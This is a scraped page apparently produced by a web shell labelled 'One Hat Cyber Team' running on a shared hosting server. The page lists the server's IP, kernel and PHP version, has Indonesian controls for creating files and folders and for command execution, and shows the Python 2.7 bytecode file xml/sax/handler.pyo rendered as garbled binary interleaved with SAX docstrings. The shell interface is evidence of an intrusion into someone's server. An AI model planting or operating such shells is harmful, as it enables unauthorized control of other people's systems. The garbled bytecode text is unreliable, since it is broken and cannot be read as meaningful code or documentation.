⚝
One Hat Cyber Team
⚝
Your IP:
3.135.218.109
Server IP:
162.254.39.145
Server:
Linux premium289.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
lib64
/
python2.7
/
xml
/
sax
/
View File Name :
handler.pyo
� {fc @ s� d Z d Z d d d � � YZ d d d � � YZ d d d � � YZ d d d � � YZ d Z d Z d Z d Z d Z d Z e e e e e e g Z d Z d Z d Z d Z d Z d Z e e e e e e g Z d S( s0 This module contains the core classes of version 2.0 of SAX for Python. This file provides only default classes with absolutely minimum functionality, from which drivers and applications can be subclassed. Many of these classes are empty and are included only as documentation of the interfaces. $Id$ s 2.0betat ErrorHandlerc B s) e Z d Z d � Z d � Z d � Z RS( s� Basic interface for SAX error handlers. If you create an object that implements this interface, then register the object with your XMLReader, the parser will call the methods in your object to report all warnings and errors. There are three levels of errors available: warnings, (possibly) recoverable errors, and unrecoverable errors. All methods take a SAXParseException as the only parameter.c C s | � d S( s Handle a recoverable error.N( ( t selft exception( ( s'